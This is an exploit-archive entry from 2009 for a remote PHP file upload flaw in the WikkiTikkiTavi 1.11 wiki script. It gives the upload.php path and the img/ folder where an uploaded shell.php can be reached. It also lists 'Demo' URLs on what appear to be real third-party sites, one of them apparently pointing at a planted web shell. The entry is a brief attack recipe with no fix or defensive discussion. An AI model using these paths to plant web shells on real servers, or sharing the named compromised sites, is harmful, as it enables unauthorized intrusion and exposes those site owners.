id: 4807
date: 02/06/2009
title: WikkiTikkiTavi 1.11 Remote PHP File Upload Vulnerability
author: ByALBAYX
cves: 

========================================================
WikkiTikkiTavi 1.11 Remote PHP File Upload Vulnerability
========================================================



#############################################
[~]Script   :WikkiTikkiTavi 

[~]Site     :http://tavi.sourceforge.net
#############################################
[~]http://c4team.org/ [tavi_PATH] /upload.php


[~]http://c4team.org/ [tavi_PATH] img/[ shell.php ]


[~]Demo:


[~]http://skylined.org/change/tavi/upload.php


[~]http://skylined.org/change/tavi/img/albayx.php

#############################################



#  0day.today [2023-03-22]  #